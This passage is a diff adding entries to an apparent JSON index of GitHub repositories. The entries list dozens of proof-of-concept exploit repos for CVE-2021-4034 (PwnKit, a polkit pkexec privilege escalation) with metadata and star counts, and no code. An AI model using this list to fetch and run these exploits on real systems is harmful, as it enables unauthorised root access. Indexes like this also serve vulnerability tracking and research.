+ "html_url": "https:\/\/github.com\/bbjubjub2494"
+ },
+ "html_url": "https:\/\/github.com\/bbjubjub2494\/cve-2021-4034-playground",
+ "description": "impromptu pwn chal",
+ "fork": false,
+ "created_at": "2022-01-25T23:37:29Z",
+ "updated_at": "2022-01-25T23:40:34Z",
+ "pushed_at": "2022-01-25T23:39:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "pwnable"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 452081015,
+ "name": "CVE-2021-4034",
+ "full_name": "berdav\/CVE-2021-4034",
+ "owner": {
+ "login": "berdav",
+ "id": 1332095,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1332095?v=4",
+ "html_url": "https:\/\/github.com\/berdav"
+ },
+ "html_url": "https:\/\/github.com\/berdav\/CVE-2021-4034",
+ "description": "CVE-2021-4034 1day",
+ "fork": false,
+ "created_at": "2022-01-25T23:51:37Z",
+ "updated_at": "2024-06-24T04:31:18Z",
+ "pushed_at": "2022-06-08T04:00:28Z",
+ "stargazers_count": 1932,
+ "watchers_count": 1932,
+ "has_discussions": false,
+ "forks_count": 509,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 509,
+ "watchers": 1932,
+ "score": 0,
+ "subscribers_count": 21
+ },
+ {
+ "id": 452088979,
+ "name": "CVE-2021-4034",
+ "full_name": "clubby789\/CVE-2021-4034",
+ "owner": {
+ "login": "clubby789",
+ "id": 13556931,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13556931?v=4",
+ "html_url": "https:\/\/github.com\/clubby789"
+ },
+ "html_url": "https:\/\/github.com\/clubby789\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T00:28:52Z",
+ "updated_at": "2023-01-10T03:23:25Z",
+ "pushed_at": "2022-01-26T01:26:26Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452094004,
+ "name": "CVE-2021-4034",
+ "full_name": "gbrsh\/CVE-2021-4034",
+ "owner": {
+ "login": "gbrsh",
+ "id": 36970331,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4",
+ "html_url": "https:\/\/github.com\/gbrsh"
+ },
+ "html_url": "https:\/\/github.com\/gbrsh\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T00:53:19Z",
+ "updated_at": "2022-03-16T09:24:39Z",
+ "pushed_at": "2022-01-26T00:57:04Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452094681,
+ "name": "CVE-2021-4034",
+ "full_name": "arthepsy\/CVE-2021-4034",
+ "owner": {
+ "login": "arthepsy",
+ "id": 7356025,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7356025?v=4",
+ "html_url": "https:\/\/github.com\/arthepsy"
+ },
+ "html_url": "https:\/\/github.com\/arthepsy\/CVE-2021-4034",
+ "description": "PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)",
+ "fork": false,
+ "created_at": "2022-01-26T00:56:36Z",
+ "updated_at": "2024-06-24T06:16:46Z",
+ "pushed_at": "2023-05-04T19:24:39Z",
+ "stargazers_count": 1034,
+ "watchers_count": 1034,
+ "has_discussions": false,
+ "forks_count": 308,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2021-4034",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 308,
+ "watchers": 1034,
+ "score": 0,
+ "subscribers_count": 16
+ },
+ {
+ "id": 452096662,
+ "name": "CVE-2021-4034",
+ "full_name": "JohnHammond\/CVE-2021-4034",
+ "owner": {
+ "login": "JohnHammond",
+ "id": 6288722,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6288722?v=4",
+ "html_url": "https:\/\/github.com\/JohnHammond"
+ },
+ "html_url": "https:\/\/github.com\/JohnHammond\/CVE-2021-4034",
+ "description": "Bash implementation of CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-26T01:05:55Z",
+ "updated_at": "2023-07-19T23:44:26Z",
+ "pushed_at": "2022-01-26T01:05:56Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 452097341,
+ "name": "CVE-2021-4034",
+ "full_name": "Audiobahn\/CVE-2021-4034",
+ "owner": {
+ "login": "Audiobahn",
+ "id": 98435709,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98435709?v=4",
+ "html_url": "https:\/\/github.com\/Audiobahn"
+ },
+ "html_url": "https:\/\/github.com\/Audiobahn\/CVE-2021-4034",
+ "description": "CVE-2021-4034 🎧",
+ "fork": false,
+ "created_at": "2022-01-26T01:09:32Z",
+ "updated_at": "2022-02-12T23:29:17Z",
+ "pushed_at": "2022-01-26T01:34:11Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 452102671,
+ "name": "poc-cve-2021-4034",
+ "full_name": "dzonerzy\/poc-cve-2021-4034",
+ "owner": {
+ "login": "dzonerzy",
+ "id": 16840842,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16840842?v=4",
+ "html_url": "https:\/\/github.com\/dzonerzy"
+ },
+ "html_url": "https:\/\/github.com\/dzonerzy\/poc-cve-2021-4034",
+ "description": "PoC for CVE-2021-4034 dubbed pwnkit",
+ "fork": false,
+ "created_at": "2022-01-26T01:34:44Z",
+ "updated_at": "2024-04-26T11:35:07Z",
+ "pushed_at": "2022-01-27T15:13:51Z",
+ "stargazers_count": 112,
+ "watchers_count": 112,
+ "has_discussions": false,
+ "forks_count": 39,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 39,
+ "watchers": 112,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 452108706,
+ "name": "CVE-2021-4034",
+ "full_name": "nikaiw\/CVE-2021-4034",
+ "owner": {
+ "login": "nikaiw",
+ "id": 1255732,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1255732?v=4",
+ "html_url": "https:\/\/github.com\/nikaiw"
+ },
+ "html_url": "https:\/\/github.com\/nikaiw\/CVE-2021-4034",
+ "description": "PoC for CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-26T02:02:25Z",
+ "updated_at": "2024-05-10T10:44:05Z",
+ "pushed_at": "2022-01-26T02:27:53Z",
+ "stargazers_count": 61,
+ "watchers_count": 61,
+ "has_discussions": false,
+ "forks_count": 41,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 41,
+ "watchers": 61,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 452126288,
+ "name": "CVE-2021-4034",
+ "full_name": "mebeim\/CVE-2021-4034",
+ "owner": {
+ "login": "mebeim",
+ "id": 14198070,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14198070?v=4",
+ "html_url": "https:\/\/github.com\/mebeim"
+ },
+ "html_url": "https:\/\/github.com\/mebeim\/CVE-2021-4034",
+ "description": "CVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept",
+ "fork": false,
+ "created_at": "2022-01-26T03:20:18Z",
+ "updated_at": "2024-03-24T19:32:49Z",
+ "pushed_at": "2022-01-26T16:22:46Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "lpe",
+ "pkexec",
+ "polkit",
+ "proof-of-concept",
+ "pwnkit"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452129115,
+ "name": "CVE-2021-4034",
+ "full_name": "Ayrx\/CVE-2021-4034",
+ "owner": {
+ "login": "Ayrx",
+ "id": 1937160,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1937160?v=4",
+ "html_url": "https:\/\/github.com\/Ayrx"
+ },
+ "html_url": "https:\/\/github.com\/Ayrx\/CVE-2021-4034",
+ "description": "Exploit for CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-26T03:33:47Z",
+ "updated_at": "2024-05-10T10:44:05Z",
+ "pushed_at": "2022-01-27T11:57:05Z",
+ "stargazers_count": 95,
+ "watchers_count": 95,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 95,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 452135667,
+ "name": "CVE-2021-4034",
+ "full_name": "Y3A\/CVE-2021-4034",
+ "owner": {
+ "login": "Y3A",
+ "id": 62646606,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62646606?v=4",
+ "html_url": "https:\/\/github.com\/Y3A"
+ },
+ "html_url": "https:\/\/github.com\/Y3A\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T04:05:50Z",
+ "updated_at": "2023-09-28T11:35:23Z",
+ "pushed_at": "2023-07-20T08:59:30Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452145787,
+ "name": "CVE-2021-4034",
+ "full_name": "An00bRektn\/CVE-2021-4034",
+ "owner": {
+ "login": "An00bRektn",
+ "id": 58986498,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58986498?v=4",
+ "html_url": "https:\/\/github.com\/An00bRektn"
+ },
+ "html_url": "https:\/\/github.com\/An00bRektn\/CVE-2021-4034",
+ "description": "A Golang implementation of clubby789's implementation of CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-26T04:58:16Z",
+ "updated_at": "2023-12-21T21:02:17Z",
+ "pushed_at": "2022-01-27T16:12:20Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "golang"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452154672,
+ "name": "CVE-2021-4034",
+ "full_name": "ayypril\/CVE-2021-4034",
+ "owner": {
+ "login": "ayypril",
+ "id": 84289343,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84289343?v=4",
+ "html_url": "https:\/\/github.com\/ayypril"
+ },
+ "html_url": "https:\/\/github.com\/ayypril\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T05:42:40Z",
+ "updated_at": "2023-08-02T02:44:40Z",
+ "pushed_at": "2022-01-26T05:42:42Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452155127,
+ "name": "CVE-2021-4034",
+ "full_name": "wongwaituck\/CVE-2021-4034",
+ "owner": {
+ "login": "wongwaituck",
+ "id": 2370088,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2370088?v=4",
+ "html_url": "https:\/\/github.com\/wongwaituck"
+ },
+ "html_url": "https:\/\/github.com\/wongwaituck\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T05:44:44Z",
+ "updated_at": "2022-01-26T07:02:46Z",
+ "pushed_at": "2022-01-26T05:46:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452158720,
+ "name": "my-cve-2021-4034-poc",
+ "full_name": "0x05a\/my-cve-2021-4034-poc",
+ "owner": {
+ "login": "0x05a",
+ "id": 45216786,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45216786?v=4",
+ "html_url": "https:\/\/github.com\/0x05a"
+ },
+ "html_url": "https:\/\/github.com\/0x05a\/my-cve-2021-4034-poc",
+ "description": "my PoC",
+ "fork": false,
+ "created_at": "2022-01-26T06:00:49Z",
+ "updated_at": "2022-01-26T06:05:24Z",
+ "pushed_at": "2022-01-26T06:05:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452177217,
+ "name": "CVE-2021-4034",
+ "full_name": "zhzyker\/CVE-2021-4034",
+ "owner": {
+ "login": "zhzyker",
+ "id": 32918050,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32918050?v=4",
+ "html_url": "https:\/\/github.com\/zhzyker"
+ },
+ "html_url": "https:\/\/github.com\/zhzyker\/CVE-2021-4034",
+ "description": "polkit pkexec Local Privilege Vulnerability to Add custom commands",
+ "fork": false,
+ "created_at": "2022-01-26T07:19:21Z",
+ "updated_at": "2023-11-20T08:54:19Z",
+ "pushed_at": "2022-01-27T06:23:02Z",
+ "stargazers_count": 46,
+ "watchers_count": 46,
+ "has_discussions": false,
+ "forks_count": 22,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 22,
+ "watchers": 46,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452189818,
+ "name": "CVE-2021-4034-new",
+ "full_name": "J0hnbX\/CVE-2021-4034-new",
+ "owner": {
+ "login": "J0hnbX",
+ "id": 98451016,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98451016?v=4",
+ "html_url": "https:\/\/github.com\/J0hnbX"
+ },
+ "html_url": "https:\/\/github.com\/J0hnbX\/CVE-2021-4034-new",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T08:05:54Z",
+ "updated_at": "2022-01-26T08:06:07Z",
+ "pushed_at": "2022-01-26T08:06:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452195404,
+ "name": "CVE-2021-4034",
+ "full_name": "Immersive-Labs-Sec\/CVE-2021-4034",
+ "owner": {
+ "login": "Immersive-Labs-Sec",
+ "id": 79456607,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4",
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec"
+ },
+ "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/CVE-2021-4034",
+ "description": "Proof of Concept for CVE-2021-4034 Polkit Privilege Escalation",
+ "fork": false,
+ "created_at": "2022-01-26T08:25:41Z",
+ "updated_at": "2023-09-27T16:39:46Z",
+ "pushed_at": "2022-01-26T09:37:18Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 452200465,
+ "name": "pkwner",
+ "full_name": "kimusan\/pkwner",
+ "owner": {
+ "login": "kimusan",
+ "id": 1150049,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1150049?v=4",
+ "html_url": "https:\/\/github.com\/kimusan"
+ },
+ "html_url": "https:\/\/github.com\/kimusan\/pkwner",
+ "description": "A python3 and bash PoC for CVE-2021-4034 by Kim Schulz",
+ "fork": false,
+ "created_at": "2022-01-26T08:43:15Z",
+ "updated_at": "2024-05-30T18:20:11Z",
+ "pushed_at": "2022-01-27T10:40:14Z",
+ "stargazers_count": 21,
+ "watchers_count": 21,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034",
+ "pwn",
+ "python",
+ "python3"
+ ],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 21,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 452219784,
+ "name": "CVE-2021-4034",
+ "full_name": "N1et\/CVE-2021-4034",
+ "owner": {
+ "login": "N1et",
+ "id": 34748334,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34748334?v=4",
+ "html_url": "https:\/\/github.com\/N1et"
+ },
+ "html_url": "https:\/\/github.com\/N1et\/CVE-2021-4034",
+ "description": "Just a sh script file to CVE-2021-4034 ",
+ "fork": false,
+ "created_at": "2022-01-26T09:46:35Z",
+ "updated_at": "2022-01-26T10:06:20Z",
+ "pushed_at": "2022-01-26T10:08:47Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452230505,
+ "name": "CVE-2021-4034",
+ "full_name": "Nero22k\/CVE-2021-4034",
+ "owner": {
+ "login": "Nero22k",
+ "id": 64486541,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64486541?v=4",
+ "html_url": "https:\/\/github.com\/Nero22k"
+ },
+ "html_url": "https:\/\/github.com\/Nero22k\/CVE-2021-4034",
+ "description": "Dirty PoC for CVE-2021-4034 (Pwnkit)",
+ "fork": false,
+ "created_at": "2022-01-26T10:22:43Z",
+ "updated_at": "2022-01-26T10:24:58Z",
+ "pushed_at": "2022-01-26T14:32:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452234457,
+ "name": "CVE-2021-4034",
+ "full_name": "LukeGix\/CVE-2021-4034",
+ "owner": {
+ "login": "LukeGix",
+ "id": 80392368,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80392368?v=4",
+ "html_url": "https:\/\/github.com\/LukeGix"
+ },
+ "html_url": "https:\/\/github.com\/LukeGix\/CVE-2021-4034",
+ "description": "A stupid poc for CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-26T10:36:35Z",
+ "updated_at": "2022-01-26T12:49:03Z",
+ "pushed_at": "2022-01-26T12:28:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452235222,
+ "name": "CVE-2021-4034-POC",
+ "full_name": "aus-mate\/CVE-2021-4034-POC",
+ "owner": {
+ "login": "aus-mate",
+ "id": 50848630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50848630?v=4",
+ "html_url": "https:\/\/github.com\/aus-mate"
+ },
+ "html_url": "https:\/\/github.com\/aus-mate\/CVE-2021-4034-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T10:39:27Z",
+ "updated_at": "2022-01-26T10:56:06Z",
+ "pushed_at": "2022-01-26T10:57:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452240756,
+ "name": "CVE-2021-4034",
+ "full_name": "chenaotian\/CVE-2021-4034",
+ "owner": {
+ "login": "chenaotian",
+ "id": 86546351,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4",
+ "html_url": "https:\/\/github.com\/chenaotian"
+ },
+ "html_url": "https:\/\/github.com\/chenaotian\/CVE-2021-4034",
+ "description": "CVE-2021-4034 POC and Docker and Analysis write up",
+ "fork": false,
+ "created_at": "2022-01-26T10:58:23Z",
+ "updated_at": "2023-09-28T11:35:23Z",
+ "pushed_at": "2022-05-23T02:03:43Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452241951,
+ "name": "CVE-2021-4034",
+ "full_name": "moldabekov\/CVE-2021-4034",
+ "owner": {
+ "login": "moldabekov",
+ "id": 669547,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/669547?v=4",
+ "html_url": "https:\/\/github.com\/moldabekov"
+ },
+ "html_url": "https:\/\/github.com\/moldabekov\/CVE-2021-4034",
+ "description": "Pseudopatch for CVE-2021-4034",
+ "fork": false,
+ "created_at": "2022-01-26T11:02:29Z",
+ "updated_at": "2022-01-26T11:20:30Z",
+ "pushed_at": "2022-01-26T11:17:37Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 452271601,
+ "name": "-CVE-2021-4034",
+ "full_name": "jostmart\/-CVE-2021-4034",
+ "owner": {
+ "login": "jostmart",
+ "id": 402127,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/402127?v=4",
+ "html_url": "https:\/\/github.com\/jostmart"
+ },
+ "html_url": "https:\/\/github.com\/jostmart\/-CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T12:44:22Z",
+ "updated_at": "2022-01-26T12:44:22Z",
+ "pushed_at": "2022-01-26T13:00:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452288004,
+ "name": "pwnkit",
+ "full_name": "c3l3si4n\/pwnkit",
+ "owner": {
+ "login": "c3l3si4n",
+ "id": 39219175,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39219175?v=4",
+ "html_url": "https:\/\/github.com\/c3l3si4n"
+ },
+ "html_url": "https:\/\/github.com\/c3l3si4n\/pwnkit",
+ "description": "PoC for the CVE-2021-4034 vulnerability, affecting polkit < 0.120.",
+ "fork": false,
+ "created_at": "2022-01-26T13:34:01Z",
+ "updated_at": "2023-09-28T11:35:23Z",
+ "pushed_at": "2022-01-26T20:17:11Z",
+ "stargazers_count": 26,
+ "watchers_count": 26,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 26,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452291757,
+ "name": "CVE-2021-4034",
+ "full_name": "c0d3cr4f73r\/CVE-2021-4034",
+ "owner": {
+ "login": "c0d3cr4f73r",
+ "id": 66146701,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4",
+ "html_url": "https:\/\/github.com\/c0d3cr4f73r"
+ },
+ "html_url": "https:\/\/github.com\/c0d3cr4f73r\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T13:45:17Z",
+ "updated_at": "2022-01-26T13:47:01Z",
+ "pushed_at": "2022-01-26T13:50:23Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 452306200,
+ "name": "PwnKit",
+ "full_name": "ly4k\/PwnKit",
+ "owner": {
+ "login": "ly4k",
+ "id": 53348818,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53348818?v=4",
+ "html_url": "https:\/\/github.com\/ly4k"
+ },
+ "html_url": "https:\/\/github.com\/ly4k\/PwnKit",
+ "description": "Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation",
+ "fork": false,
+ "created_at": "2022-01-26T14:26:10Z",
+ "updated_at": "2024-06-25T10:22:59Z",
+ "pushed_at": "2022-06-21T14:52:05Z",
+ "stargazers_count": 1007,
+ "watchers_count": 1007,
+ "has_discussions": false,
+ "forks_count": 180,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4034"
+ ],
+ "visibility": "public",
+ "forks": 180,
+ "watchers": 1007,
+ "score": 0,
+ "subscribers_count": 14
+ },
+ {
+ "id": 452311547,
+ "name": "CVE-2021-4034-POC",
+ "full_name": "san3ncrypt3d\/CVE-2021-4034-POC",
+ "owner": {
+ "login": "san3ncrypt3d",
+ "id": 32395477,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32395477?v=4",
+ "html_url": "https:\/\/github.com\/san3ncrypt3d"
+ },
+ "html_url": "https:\/\/github.com\/san3ncrypt3d\/CVE-2021-4034-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T14:40:27Z",
+ "updated_at": "2022-01-26T14:41:01Z",
+ "pushed_at": "2022-01-26T14:43:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452318593,
+ "name": "CVE-2021-4034",
+ "full_name": "fdellwing\/CVE-2021-4034",
+ "owner": {
+ "login": "fdellwing",
+ "id": 22813377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22813377?v=4",
+ "html_url": "https:\/\/github.com\/fdellwing"
+ },
+ "html_url": "https:\/\/github.com\/fdellwing\/CVE-2021-4034",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-26T14:59:37Z",
+ "updated_at": "2022-01-26T15:06:30Z",
+ "pushed_at": "2022-01-26T15:06:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 452321441,
+ "name": "CVE-2021-4034-UniontechOS",
+ "full_name": "xcanwin\/CVE-2021-4034-UniontechOS",
